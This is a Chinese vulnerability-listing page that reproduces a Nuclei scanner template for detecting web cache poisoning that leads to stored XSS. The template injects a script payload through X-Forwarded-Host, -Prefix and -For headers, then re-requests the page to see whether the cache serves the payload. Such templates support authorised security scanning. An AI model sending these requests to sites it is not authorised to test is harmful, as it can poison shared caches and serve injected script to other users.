cache-poisoning-xss: Cache Poisoning - Stored XSS

日期: 2025-09-01 | 影响软件: cache poisoning xss | POC: 已公开

漏洞描述

PoC代码[已公开]

id: cache-poisoning-xss

info:
  name: Cache Poisoning - Stored XSS
  author: melbadry9,xelkomy,akincibor
  severity: high
  description: Cache Poisoning leads to Stored XSS.
  reference:
    - https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning
    - https://portswigger.net/research/practical-web-cache-poisoning
    - https://portswigger.net/web-security/web-cache-poisoning
  metadata:
    max-request: 2
  tags: cache,generic,xss,vuln
variables:
  cache_key: "{{to_lower(rand_base(6))}}"
  cache_header: "{{to_lower(rand_base(6))}}"
  xss_payload: '"></script><script>alert(document.domain);</script>'

http:
  - raw:
      - |
        GET /?{{cache_key}}=1 HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-Prefix: {{cache_header}}.xfp{{xss_payload}}
        X-Forwarded-Host: {{cache_header}}.xfh{{xss_payload}}
        X-Forwarded-For: {{cache_header}}.xff{{xss_payload}}
      - |
        GET /?{{cache_key}}=1 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - contains(body_2, cache_header)
          - contains(body_2, xss_payload)
        condition: and
# digest: 4b0a00483046022100bf4dfcc59dc10451ff454007751a20caf705a674647d46a981cecfc412f63131022100e334017cd456af01bc30052e639654c246f166f6bea17558f528714b0885c428:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/generic/cache-poisoning-xss.yaml

相关漏洞推荐